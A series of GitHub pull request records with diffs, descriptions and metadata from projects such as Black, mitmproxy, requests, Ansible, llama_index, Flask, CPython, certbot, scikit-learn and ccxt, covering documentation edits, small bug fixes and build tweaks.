Release]. + Below are descriptions of our release workflows. -### Docker +### Publish to PyPI + +This is our main workflow. It builds an [sdist] and [wheels] to upload to PyPI where the +vast majority of users will download Black from. It's divided into three job groups: + +#### sdist + pure wheel -This workflow uses the QEMU powered `buildx` feature of docker to upload a `arm64` and -`amd64`/`x86_64` build of the official _Black_ docker image™. +This single job builds the sdist and pure Python wheel (i.e., a wheel that only contains +Python code) using [build] and then uploads them to PyPI using [twine]. These artifacts +are general-purpose and can be used on basically any platform supported by Python. -- Currently this workflow uses an API Token associated with @cooperlees account +#### mypyc wheels (…) -### pypi_upload +We use [mypyc] to compile _Black_ into a CPython C extension for significantly improved +performance. Wheels built with mypyc are platform and Python version specific. +[Supported platforms are documented in the FAQ](labels/mypyc-support). -This workflow builds a Python -[sdist](https://docs.python.org/3/distutils/sourcedist.html) and -[wheel](https://pythonwheels.com) using the latest -[setuptools](https://pypi.org/project/setuptools/) and -[wheel](https://pypi.org/project/wheel/) modules. +These matrix jobs use [cibuildwheel] which handles the complicated task of building C +extensions for many environments for us. 
Since building these wheels is slow, there are +multiple mypyc wheels jobs (hence the term "matrix") that build for a specific platform +(as noted in the job name in parentheses). -It will then use [twine](https://pypi.org/project/twine/) to upload both release formats -to PyPI for general downloading of the _Black_ Python package. This is where -[pip](https://pypi.org/project/pip/) looks by default. +Like the previous job group, the built wheels are uploaded to PyPI using [twine]. -- Currently this workflow uses an API token associated with @ambv's PyPI account +#### Update stable branch -### Upload self-contained binaries +So this job doesn't _really_ belong here, but updating the `stable` branch after the +other PyPI jobs pass (they must pass for this job to start) makes the most sense. This +saves us from remembering to update the branch sometime after cutting the release. -This workflow builds self-contained binaries for multiple platforms. This allows people -to download the executable for their platform and run _Black_ without a -[Python Runtime](https://wiki.python.org/moin/PythonImplementations) installed. +- _Currently this workflow uses an API token associated with @ambv's PyPI account_ -The created binaries are attached/stored on the associated -[GitHub Release](https://github.com/psf/black/releases) for download over _IPv4 only_ -(GitHub still does not have IPv6 access 😢). +### Publish executables -## Moving the `stable` tag +This workflow builds native executables for multiple platforms using [PyInstaller]. This +allows people to download the executable for their platform and run _Black_ without a +[Python runtime](https://wiki.python.org/moin/PythonImplementations) installed. -_Black_ provides a stable tag for people who want to move along as _Black_ developers -deem the newest version reliable. Here the _Black_ developers will move once the release -has been problem free for at least ~24 hours from release. Given the large _Black_ -userbase we hear about bad bugs quickly. We do strive to continually improve our CI too. +The created binaries are stored on the associated GitHub Release for download over _IPv4 +only_ (GitHub still does not have IPv6 access 😢). -### Tag moving process +### docker -#### stable +This workflow uses the QEMU powered `buildx` feature of Docker to upload an `arm64` and +`amd64`/`x86_64` build of the official _Black_ Docker image™. -From a rebased `main` checkout: +- _Currently this workflow uses an API Token associated with @cooperlees account_ + +```{note} +This also runs on each push to `main`. +``` -1. `git tag -f stable VERSION_TAG` - 1. e.g. `git tag -f stable 21.5b1` -1. 
`git push --tags -f` +[black-actions]: https://github.com/psf/black/actions +[build]: https://pypa-build.readthedocs.io/ +[calver]: https://calver.org +[cibuildwheel]: https://cibuildwheel.readthedocs.io/ +[gh-3139]: https://github.com/psf/black/pull/3139 +[github actions]: https://github.com/features/actions +[github release]: https://github.com/psf/black/releases +[new-release]: https://github.com/psf/black/releases/new +[mypyc]: https://mypyc.readthedocs.io/ +[mypyc-platform-support]: + /faq.html#what-is-compiled-yes-no-all-about-in-the-version-output +[pyinstaller]: https://www.pyinstaller.org/ +[sdist]: + https://packaging.python.org/en/latest/glossary/#term-Source-Distribution-or-sdist +[twine]: https://github.com/features/actions +[wheels]: https://packaging.python.org/en/latest/glossary/#term-Wheel diff --git a/docs/faq.md b/docs/faq.md index b2fe42de282..aeb9634789f 100644 --- a/docs/faq.md +++ b/docs/faq.md @@ -114,6 +114,8 @@ errors is not a goal. It can format all code accepted by CPython (if you find an where that doesn't hold, please report a bug!), but it may also format some code that CPython doesn't accept. +(labels/mypyc-support)= + ## What is `compiled: yes/no` all about in the version output? While _Black_ is indeed a pure Python project, we use [mypyc] to compile _Black_ into a diff --git a/docs/the_black_code_style/index.md b/docs/the_black_code_style/index.md index c7f29af6c73..e5967be2db4 100644 --- a/docs/the_black_code_style/index.md +++ b/docs/the_black_code_style/index.md @@ -19,6 +19,8 @@ style aspects and details might change according to the stability policy present below. Ongoing style considerations are tracked on GitHub with the [design](https://github.com/psf/black/labels/T%3A%20design) issue label. +(labels/stability-policy)= + ## Stability Policy The following policy applies for the _Black_ code style, in non pre-release versions of
### Description - Formalise release cadence guidelines - Overhaul release steps to be easier to follow and more thorough - Reorder changelog template to something more sensible - Update release automation docs to reflect recent improvements (notably the addition of in-repo mypyc wheel builds) ### Review notes See https://ichard26-testblackdocs.readthedocs.io/en/overhaul-release-doc/contributing/release_process.html for a preview of this newly rewritten document. @felix-hilden given you might be RMing the next release, it'd be great if you could check that this all makes sense to you! Thank you! This also depends on #3223 as this PR assumes it's already been landed. Anyway I'll note my other potential points of discussion as comments. ### Checklist - did you ... - [x] Add a CHANGELOG entry if necessary? -> this is internal only so n/a - [x] Add / update tests if necessary? -> n/a - [x] Add new / update outdated documentation? I heard this is a 100% documentation patch :) <!-- Just as a reminder, everyone in all psf/black spaces including PRs must follow the PSF Code of Conduct (link below). Finally, once again thanks for your time and effort. If you have any feedback in regards to your experience contributing here, please let us know! Helpful links: PSF COC: https://www.python.org/psf/conduct/ Contributing docs: https://black.readthedocs.io/en/latest/contributing/index.html Chat on Python Discord: https://discord.gg/RtVdv86PrH -->
https://api.github.com/repos/psf/black/pulls/3242
2022-08-28T02:34:38Z
2022-08-31T21:46:49Z
2022-08-31T21:46:48Z
2022-08-31T21:47:40Z
3,676
psf/black
23,984
typo
diff --git a/docs/src/content/concepts-commands.md b/docs/src/content/concepts-commands.md index 73e8adaed4..d826ec89e0 100644 --- a/docs/src/content/concepts-commands.md +++ b/docs/src/content/concepts-commands.md @@ -18,7 +18,7 @@ and many of the built-in argument types - give it a try. The canonical reference for commands is the `--commands` flag, which is exposed by each of the mitmproxy tools. Passing this flag will dump an annotated list of all registered commands, their arguments and their return values to screen. In -mimtproxy console you can also view a palette of all commands in the command +mitmproxy console you can also view a palette of all commands in the command browser (by default accessible with the `C` key binding). # Working with Flows
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/5062
2022-01-15T23:37:11Z
2022-01-15T23:37:58Z
2022-01-15T23:37:57Z
2022-01-15T23:37:58Z
195
mitmproxy/mitmproxy
27,448
Don't mention pip as the reason for supporting py2
diff --git a/docs/community/faq.rst b/docs/community/faq.rst index 177eaec4eb..fbdd9dadcc 100644 --- a/docs/community/faq.rst +++ b/docs/community/faq.rst @@ -62,10 +62,7 @@ Python 2 Support? Yes! We do not have immediate plans to `sunset <https://www.python.org/doc/sunset-python-2/>`_ our support for Python -2.7. We understand that we have a large user base with varying needs, -and intend to maintain Python 2.7 support within Requests until `pip -stops supporting Python 2.7 (there's no estimated date on that yet) -<https://pip.pypa.io/en/latest/development/release-process/#python-2-support>`_. +2.7. We understand that we have a large user base with varying needs. That said, it is *highly* recommended users migrate to Python 3.6+ since Python 2.7 is no longer receiving bug fixes or security updates as of January 1, 2020.
since pip no longer supports Python 2
https://api.github.com/repos/psf/requests/pulls/5940
2021-09-21T22:34:57Z
2021-09-21T23:22:12Z
2021-09-21T23:22:12Z
2021-12-21T00:00:43Z
242
psf/requests
32,395
Connection function for boto3
diff --git a/lib/ansible/module_utils/ec2.py b/lib/ansible/module_utils/ec2.py index 417e1b9521b664..9d406d0890a050 100644 --- a/lib/ansible/module_utils/ec2.py +++ b/lib/ansible/module_utils/ec2.py @@ -46,6 +46,19 @@ 'us-gov-west-1', ] +def boto3_conn(module, conn_type=None, resource=None, region=None, endpoint=None, **params): + if conn_type not in ['both', 'resource', 'client']: + module.fail_json(msg='There is an issue in the code of the module. You must specify either both, resource or client to the conn_type parameter in the boto3_conn function call') + + resource = boto3.session.Session().resource(resource, region_name=region, endpoint_url=endpoint, **params) + client = resource.meta.client + + if conn_type == 'resource': + return resource + elif conn_type == 'client': + return client + else: + return client, resource def aws_common_argument_spec(): return dict( @@ -72,7 +85,7 @@ def boto_supports_profile_name(): return hasattr(boto.ec2.EC2Connection, 'profile_name') -def get_aws_connection_info(module): +def get_aws_connection_info(module, boto3=False): # Check module args for credentials, then check environment vars # access_key @@ -131,19 +144,31 @@ def get_aws_connection_info(module): # in case security_token came in as empty string security_token = None - boto_params = dict(aws_access_key_id=access_key, - aws_secret_access_key=secret_key, - security_token=security_token) + if boto3: + boto_params = dict(aws_access_key_id=access_key, + aws_secret_access_key=secret_key, + aws_session_token=security_token) + if validate_certs: + boto_params['verify'] = validate_certs - # profile_name only works as a key in boto >= 2.24 - # so only set profile_name if passed as an argument - if profile_name: - if not boto_supports_profile_name(): - module.fail_json("boto does not support profile_name before 2.24") - boto_params['profile_name'] = profile_name + if profile_name: + boto_params['profile_name'] = profile_name - if validate_certs and HAS_LOOSE_VERSION and LooseVersion(boto.Version) >= LooseVersion("2.6.0"): - boto_params['validate_certs'] = validate_certs + + else: + boto_params = dict(aws_access_key_id=access_key, + aws_secret_access_key=secret_key, + security_token=security_token) + + # profile_name only works as a key in boto >= 2.24 + # so only set profile_name if passed as an argument + if profile_name: + if not boto_supports_profile_name(): + module.fail_json("boto does not support profile_name before 2.24") + boto_params['profile_name'] = profile_name + + if validate_certs and HAS_LOOSE_VERSION and LooseVersion(boto.Version) >= LooseVersion("2.6.0"): + boto_params['validate_certs'] = validate_certs return region, ec2_url, boto_params
This adds a simple connection function for boto3. Inside of a module's code, it would be used like: ``` python region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True) ec2_client, ec2_res = boto3_conn(module, conn_type='both', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs) all_vpcs = ec2_client.describe_vpcs() ``` There are two noticeable pieces that make it functionally different from the current connection functions: - `conn_type`: refers to the type of session you want, whether a high-level resource session, a low-level client session, or both. The boto3 docs regarding sessions are [here](http://boto3.readthedocs.org/en/latest/reference/core/session.html) - `resource`: this is the AWS resource you want to communicate with, such as ec2, s3, autoscaling, etc. The full list is [here](http://boto3.readthedocs.org/en/latest/reference/services/index.html) This should allow everyone to start using boto3 for module development/enhancement right away.
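A further hedged sketch of the other `conn_type` values (this assumes it runs inside an Ansible module where `module` is an existing AnsibleModule instance; the bucket and instance calls are plain boto3 APIs, not part of this patch):

```python
# Sketch only: `module` is assumed to be an AnsibleModule built by the caller.
from ansible.module_utils.ec2 import get_aws_connection_info, boto3_conn

region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)

# Low-level client session only.
s3_client = boto3_conn(module, conn_type='client', resource='s3',
                       region=region, endpoint=ec2_url, **aws_connect_kwargs)
bucket_names = [b['Name'] for b in s3_client.list_buckets()['Buckets']]

# High-level resource session only.
ec2_resource = boto3_conn(module, conn_type='resource', resource='ec2',
                          region=region, endpoint=ec2_url, **aws_connect_kwargs)
instance_ids = [i.id for i in ec2_resource.instances.all()]
```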
https://api.github.com/repos/ansible/ansible/pulls/11591
2015-07-14T21:39:17Z
2015-07-23T19:54:28Z
2015-07-23T19:54:28Z
2019-04-26T15:46:49Z
765
ansible/ansible
49,210
Unicode string that often causes rendering issues
diff --git a/blns.txt b/blns.txt index 530606a..29a53f6 100644 --- a/blns.txt +++ b/blns.txt @@ -116,13 +116,14 @@ INF ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя ٠١٢٣٤٥٦٧٨٩ -# Unicode Subscript/Superscript +# Unicode Subscript/Superscript/Accents # # Strings which contain unicode subscripts/superscripts; can cause rendering issues ⁰⁴⁵ ₀₁₂ ⁰⁴⁵₀₁₂ +ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ # Quotation Marks #
Adding string containing three ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ characters that often causes rendering issues.
https://api.github.com/repos/minimaxir/big-list-of-naughty-strings/pulls/102
2016-12-19T14:27:32Z
2017-01-15T20:49:17Z
2017-01-15T20:49:17Z
2017-01-15T20:49:17Z
375
minimaxir/big-list-of-naughty-strings
4,928
Fix tests to use ANSIBLE_TEST_PYTHON_INTERPRETER.
diff --git a/test/integration/targets/groupby_filter/runme.sh b/test/integration/targets/groupby_filter/runme.sh index 8f9fce9b568bc4..f65cc008f685a8 100755 --- a/test/integration/targets/groupby_filter/runme.sh +++ b/test/integration/targets/groupby_filter/runme.sh @@ -7,12 +7,7 @@ MYTMPDIR=$(mktemp -d 2>/dev/null || mktemp -d -t 'mytmpdir') trap 'rm -rf "${MYTMPDIR}"' EXIT -# This is needed for the ubuntu1604py3 tests -# Ubuntu patches virtualenv to make the default python2 -# but for the python3 tests we need virtualenv to use python3 -PYTHON=$("python${ANSIBLE_TEST_PYTHON_VERSION:-}" -c "import sys; print(sys.executable)") - -virtualenv --system-site-packages --python "${PYTHON}" "${MYTMPDIR}/jinja2" +virtualenv --system-site-packages --python "${ANSIBLE_TEST_PYTHON_INTERPRETER}" "${MYTMPDIR}/jinja2" source "${MYTMPDIR}/jinja2/bin/activate" diff --git a/test/integration/targets/template_jinja2_latest/runme.sh b/test/integration/targets/template_jinja2_latest/runme.sh index e0fd0882b7d276..88df29622415ea 100755 --- a/test/integration/targets/template_jinja2_latest/runme.sh +++ b/test/integration/targets/template_jinja2_latest/runme.sh @@ -7,12 +7,7 @@ MYTMPDIR=$(mktemp -d 2>/dev/null || mktemp -d -t 'mytmpdir') trap 'rm -rf "${MYTMPDIR}"' EXIT -# This is needed for the ubuntu1604py3 tests -# Ubuntu patches virtualenv to make the default python2 -# but for the python3 tests we need virtualenv to use python3 -PYTHON=$("python${ANSIBLE_TEST_PYTHON_VERSION:-}" -c "import sys; print(sys.executable)") - -virtualenv --system-site-packages --python "${PYTHON}" "${MYTMPDIR}/jinja2" +virtualenv --system-site-packages --python "${ANSIBLE_TEST_PYTHON_INTERPRETER}" "${MYTMPDIR}/jinja2" source "${MYTMPDIR}/jinja2/bin/activate"
##### SUMMARY Fix tests to use ANSIBLE_TEST_PYTHON_INTERPRETER. ##### ISSUE TYPE Bugfix Pull Request ##### COMPONENT NAME integration tests
https://api.github.com/repos/ansible/ansible/pulls/52352
2019-02-15T19:17:39Z
2019-02-15T19:24:08Z
2019-02-15T19:24:08Z
2019-07-25T16:50:47Z
534
ansible/ansible
48,881
fix for complex conditional links in query pipeline
diff --git a/llama-index-core/llama_index/core/query_pipeline/query.py b/llama-index-core/llama_index/core/query_pipeline/query.py index 15c72d6658902..d6abc16ec7cf5 100644 --- a/llama-index-core/llama_index/core/query_pipeline/query.py +++ b/llama-index-core/llama_index/core/query_pipeline/query.py @@ -477,11 +477,16 @@ def _process_component_output( ) -> List[str]: """Process component output.""" new_queue = queue.copy() - # if there's no more edges, add result to output + + nodes_to_keep = set() + nodes_to_remove = set() + + # if there's no more edges, clear queue if module_key in self._get_leaf_keys(): - result_outputs[module_key] = output_dict + new_queue = [] else: edge_list = list(self.dag.edges(module_key, data=True)) + # everything not in conditional_edge_list is regular for _, dest, attr in edge_list: output = get_output(attr.get("src_key"), output_dict) @@ -505,9 +510,56 @@ def _process_component_output( self.module_dict[dest], all_module_inputs[dest], ) + nodes_to_keep.add(dest) else: - # remove dest from queue - new_queue.remove(dest) + nodes_to_remove.add(dest) + + # remove nodes from the queue, as well as any nodes that depend on dest + # be sure to not remove any remaining dependencies of the current path + available_paths = [] + for node in nodes_to_keep: + for leaf_node in self._get_leaf_keys(): + if leaf_node == node: + available_paths.append([node]) + else: + available_paths.extend( + list( + networkx.all_simple_paths( + self.dag, source=node, target=leaf_node + ) + ) + ) + + # this is a list of all nodes between the current node(s) and the leaf nodes + nodes_to_never_remove = set(x for path in available_paths for x in path) # noqa + + removal_paths = [] + for node in nodes_to_remove: + for leaf_node in self._get_leaf_keys(): + if leaf_node == node: + removal_paths.append([node]) + else: + removal_paths.extend( + list( + networkx.all_simple_paths( + self.dag, source=node, target=leaf_node + ) + ) + ) + + # this is a list of all nodes between the current node(s) to remove and the leaf nodes + nodes_to_probably_remove = set( # noqa + x for path in removal_paths for x in path + ) + + # remove nodes that are not in the current path + for node in nodes_to_probably_remove: + if node not in nodes_to_never_remove: + new_queue.remove(node) + + # did we remove all remaining edges? 
then we have our result + if len(new_queue) == 0: + result_outputs[module_key] = output_dict return new_queue diff --git a/llama-index-core/tests/query_pipeline/test_query.py b/llama-index-core/tests/query_pipeline/test_query.py index 9ae780cdeea35..d306cac737f0f 100644 --- a/llama-index-core/tests/query_pipeline/test_query.py +++ b/llama-index-core/tests/query_pipeline/test_query.py @@ -408,3 +408,91 @@ def choose_fn(input: int) -> Dict: output = p.run(inp1=2, inp2=3) # should go to b assert output == "3:2" + + +def test_query_pipeline_super_conditional() -> None: + """This tests that paths are properly pruned and maintained for many conditional edges.""" + + def simple_fn(val: int): + print("Running simple_fn", flush=True) + return val + + def over_twenty_fn(val: int): + print("Running over_twenty_fn", flush=True) + return val + 100 + + def final_fn(x: int, y: int, z: int): + print("Running final_fn", flush=True) + return { + "x": x, + "y": y, + "z": z, + } + + simple_function_component = FnComponent(fn=simple_fn, output_key="output") + over_twenty_function_2 = FnComponent(fn=over_twenty_fn, output_key="output") + final_fn = FnComponent(fn=final_fn, output_key="output") + + qp = QueryPipeline( + modules={ + "first_decision": simple_function_component, + "second_decision": simple_function_component, + "under_ten": simple_function_component, + "over_twenty": simple_function_component, + "over_twenty_2": over_twenty_function_2, + "final": final_fn, + }, + verbose=True, + ) + + qp.add_link( + "first_decision", + "under_ten", + condition_fn=lambda x: x < 10, + ) + qp.add_link("under_ten", "final", dest_key="x") + qp.add_link("under_ten", "final", dest_key="y") + qp.add_link("under_ten", "final", dest_key="z") + + qp.add_link( + "first_decision", + "second_decision", + condition_fn=lambda x: x >= 10, + ) + + qp.add_link( + "second_decision", + "over_twenty", + condition_fn=lambda x: x > 20, + ) + qp.add_link( + "second_decision", + "over_twenty_2", + condition_fn=lambda x: x > 20, + ) + + qp.add_link( + "second_decision", + "final", + dest_key="z", + condition_fn=lambda x: x > 20, + ) + qp.add_link( + "over_twenty", + "final", + dest_key="x", + ) + qp.add_link( + "over_twenty_2", + "final", + dest_key="y", + ) + + response = qp.run(val=9) + assert response == {"x": 9, "y": 9, "z": 9} + + response = qp.run(val=11) + assert response == 11 + + response = qp.run(val=21) + assert response == {"x": 21, "y": 121, "z": 21}
There is an issue where complex query pipelines with conditional links can leave the `queue` from the topological sort in an invalid state: when a node is removed from the queue, all of its dependencies need to be removed as well. The catch here is that we can't remove dependencies that still lie on a valid path. A toy sketch of this pruning rule is shown below.
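For illustration only, using networkx the same way the patch does; the node names are made up and this is not the library code itself.

```python
# Toy sketch of the pruning rule: a node scheduled for removal is only dropped
# if none of its downstream paths to a leaf overlaps with a path that must stay.
import networkx as nx

dag = nx.DiGraph()
dag.add_edges_from([
    ("first", "under_ten"),   # taken when val < 10
    ("first", "second"),      # taken when val >= 10
    ("under_ten", "final"),
    ("second", "final"),
])

leaves = [n for n in dag.nodes if dag.out_degree(n) == 0]

def downstream(node):
    """All nodes on any simple path from `node` to a leaf (including node itself)."""
    nodes = {node}
    for leaf in leaves:
        for path in nx.all_simple_paths(dag, source=node, target=leaf):
            nodes.update(path)
    return nodes

# Suppose the condition picked the "under_ten" branch.
nodes_to_keep = downstream("under_ten")            # {'under_ten', 'final'}
nodes_to_probably_remove = downstream("second")    # {'second', 'final'}

# "final" appears in both sets, so it survives; only "second" is pruned.
pruned = nodes_to_probably_remove - nodes_to_keep
print(pruned)  # {'second'}
```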
https://api.github.com/repos/run-llama/llama_index/pulls/12805
2024-04-12T22:06:56Z
2024-04-14T04:32:21Z
2024-04-14T04:32:21Z
2024-04-14T04:32:21Z
1,521
run-llama/llama_index
6,022
Fix typo in pop documentation
diff --git a/src/flask/ctx.py b/src/flask/ctx.py index 172f6a01b3..4e6b40b177 100644 --- a/src/flask/ctx.py +++ b/src/flask/ctx.py @@ -61,7 +61,7 @@ def pop(self, name, default=_sentinel): :param name: Name of attribute to pop. :param default: Value to return if the attribute is not present, - instead of raise a ``KeyError``. + instead of raising a ``KeyError``. .. versionadded:: 0.11 """
<!-- Commit checklist: * add tests that fail without the patch * ensure all tests pass with ``pytest`` * add documentation to the relevant docstrings or pages * add ``versionadded`` or ``versionchanged`` directives to relevant docstrings * add a changelog entry if this patch changes code Tests, coverage, and docs will be run automatically when you submit the pull request, but running them yourself can save time. --> Just fixes a minor typo I noticed while reading the docs.
https://api.github.com/repos/pallets/flask/pulls/3336
2019-08-16T01:06:03Z
2019-08-16T01:30:06Z
2019-08-16T01:30:06Z
2020-11-14T01:52:45Z
141
pallets/flask
20,024
bpo-32237: Fix missing DECREF of mod
diff --git a/Python/import.c b/Python/import.c index 57521e4920715c..96839c6935a4ba 100644 --- a/Python/import.c +++ b/Python/import.c @@ -1729,6 +1729,7 @@ PyImport_ImportModuleLevelObject(PyObject *name, PyObject *globals, } } else { + Py_XDECREF(mod); mod = import_find_and_load(abs_name); if (mod == NULL) { goto error;
The code reorg in commit eea3cc1ef0dec0af193eedb4c1164263fbdfd8cc introduced a leak by accidentally dropping a Py_XDECREF(mod) call. The fix is trivial. <!-- issue-number: bpo-32237 --> https://bugs.python.org/issue32237 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/4749
2017-12-07T17:35:09Z
2017-12-08T00:25:00Z
2017-12-08T00:25:00Z
2017-12-08T00:25:02Z
113
python/cpython
4,358
Create Onepad_Cipher.py
diff --git a/ciphers/Onepad_Cipher.py b/ciphers/Onepad_Cipher.py new file mode 100644 index 000000000000..4365924920f6 --- /dev/null +++ b/ciphers/Onepad_Cipher.py @@ -0,0 +1,28 @@ +class Onepad: + def encrypt(self, text): + '''Function to encrypt text using psedo-random numbers''' + plain = [] + key = [] + cipher = [] + for i in text: + plain.append(ord(i)) + for i in plain: + k = random.randint(1, 300) + c = (i+k)*k + cipher.append(c) + key.append(k) + return cipher, key + + def decrypt(self, cipher, key): + '''Function to decrypt text using psedo-random numbers.''' + plain = [] + for i in range(len(key)): + p = (cipher[i]-(key[i])**2)/key[i] + plain.append(chr(p)) + plain = ''.join([i for i in plain]) + return plain + +if __name__ == '__main__': + c,k = Onepad().encrypt('Hello') + print c, k + print Onepad().decrypt(c, k)
In the one-time pad algorithm, the length of the key and the length of the message are equal, which results in endless possibilities of false messages under brute force.
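A minimal Python 3 sketch of the classic one-time pad property the description refers to; this is illustrative only and not the arithmetic scheme used in the PR's code.

```python
# Classic one-time pad: the key is as long as the message, and XOR-ing with
# the key both encrypts and decrypts.
import secrets

def encrypt(plaintext: bytes):
    key = secrets.token_bytes(len(plaintext))   # key length == message length
    cipher = bytes(p ^ k for p, k in zip(plaintext, key))
    return cipher, key

def decrypt(cipher: bytes, key: bytes) -> bytes:
    return bytes(c ^ k for c, k in zip(cipher, key))

cipher, key = encrypt(b"Hello")
assert decrypt(cipher, key) == b"Hello"
print(cipher.hex(), key.hex())
```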
https://api.github.com/repos/TheAlgorithms/Python/pulls/285
2018-04-13T15:51:58Z
2018-04-13T16:41:50Z
2018-04-13T16:41:50Z
2018-04-13T16:41:50Z
295
TheAlgorithms/Python
30,006
Temporarily disable Apache 2.2 support
diff --git a/letsencrypt-apache/letsencrypt_apache/configurator.py b/letsencrypt-apache/letsencrypt_apache/configurator.py index 4066d626493..2ce9d008b2c 100644 --- a/letsencrypt-apache/letsencrypt_apache/configurator.py +++ b/letsencrypt-apache/letsencrypt_apache/configurator.py @@ -154,7 +154,7 @@ def prepare(self): # Set Version if self.version is None: self.version = self.get_version() - if self.version < (2, 2): + if self.version < (2, 4): raise errors.NotSupportedError( "Apache Version %s not supported.", str(self.version))
ping @pde
https://api.github.com/repos/certbot/certbot/pulls/2171
2016-01-14T00:17:51Z
2016-01-14T00:26:04Z
2016-01-14T00:26:04Z
2016-01-28T20:45:02Z
164
certbot/certbot
2,607
[MRG] Use ccache on Travis
diff --git a/.travis.yml b/.travis.yml index a0740180adbfb..3bdf91f4ab4d4 100644 --- a/.travis.yml +++ b/.travis.yml @@ -7,6 +7,7 @@ cache: apt: true directories: - $HOME/.cache/pip + - $HOME/.ccache dist: trusty diff --git a/build_tools/travis/install.sh b/build_tools/travis/install.sh index fe0d46821e29d..257cfb17f3938 100755 --- a/build_tools/travis/install.sh +++ b/build_tools/travis/install.sh @@ -13,15 +13,16 @@ set -e -# Fix the compilers to workaround avoid having the Python 3.4 build -# lookup for g++44 unexpectedly. -export CC=gcc -export CXX=g++ - echo 'List files from cached directories' echo 'pip:' ls $HOME/.cache/pip +export CC=/usr/lib/ccache/gcc +export CXX=/usr/lib/ccache/g++ +# Useful for debugging how ccache is used +# export CCACHE_LOGFILE=/tmp/ccache.log +# ~60M is used by .ccache when compiling from scratch at the time of writing +ccache --max-size 100M --show-stats if [[ "$DISTRIB" == "conda" ]]; then # Deactivate the travis-provided virtual environment and setup a @@ -99,8 +100,10 @@ try: except ImportError: pass " - python setup.py develop + ccache --show-stats + # Useful for debugging how ccache is used + # cat $CCACHE_LOGFILE fi if [[ "$RUN_FLAKE8" == "true" ]]; then
Use ccache and add .ccache to the Travis cache. This should save 2-4 minutes of compilation on each build that builds scikit-learn. In some tests on Travis there seems to be some variability, but here is what I found (I used `time python setup.py develop` to get a better idea of the timings): * when ccache is working, `python setup.py develop` takes 45s-1min (cython compilation) * without ccache it is about 3-5 min (cython compilation + compilation of the generated .c and .cpp files) I tried many different things, but for some reason just using `export PATH=/usr/lib/ccache:$PATH` as I do locally does not seem to be enough ...
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/9006
2017-06-06T13:22:02Z
2017-06-09T09:22:21Z
2017-06-09T09:22:21Z
2017-06-09T09:22:24Z
402
scikit-learn/scikit-learn
46,002
add margin docstrings
diff --git a/js/ascendex.js b/js/ascendex.js index ff04e5445e3f..43129ff1a586 100644 --- a/js/ascendex.js +++ b/js/ascendex.js @@ -2514,6 +2514,15 @@ module.exports = class ascendex extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name ascendex#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the ascendex api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/binance.js b/js/binance.js index 09bd3012fb26..e783e2061425 100644 --- a/js/binance.js +++ b/js/binance.js @@ -5551,6 +5551,15 @@ module.exports = class binance extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name binance#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the binance api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 1, params); } diff --git a/js/bitget.js b/js/bitget.js index f468406d56c6..acb0c2f61c75 100644 --- a/js/bitget.js +++ b/js/bitget.js @@ -2783,6 +2783,15 @@ module.exports = class bitget extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name bitget#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the bitget api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ const holdSide = this.safeString (params, 'holdSide'); if (holdSide === undefined) { throw new ArgumentsRequired (this.id + ' addMargin() requires a holdSide parameter, either long or short'); diff --git a/js/coinex.js b/js/coinex.js index 973e2230ee6d..a19180b0cd0e 100644 --- a/js/coinex.js +++ b/js/coinex.js @@ -3147,6 +3147,15 @@ module.exports = class coinex extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name coinex#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the coinex api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 1, params); } diff --git a/js/exmo.js b/js/exmo.js index 38a4eeeb2301..0a04c4a8aded 100644 --- a/js/exmo.js +++ b/js/exmo.js @@ -268,6 +268,15 @@ module.exports = class exmo extends Exchange { } async addMargin (symbol, amount, params = {}) { + /** + * @method + * @name exmo#addMargin + * @description add margin + * @param {str} symbol unified market symbol + * @param {float} amount amount of margin to add + * @param {dict} params extra parameters specific to the exmo api endpoint + * @returns {dict} a [margin structure]{@link https://docs.ccxt.com/en/latest/manual.html#add-margin-structure} + */ return await this.modifyMarginHelper (symbol, amount, 'add', params); } diff --git a/js/hitbtc3.js b/js/hitbtc3.js 
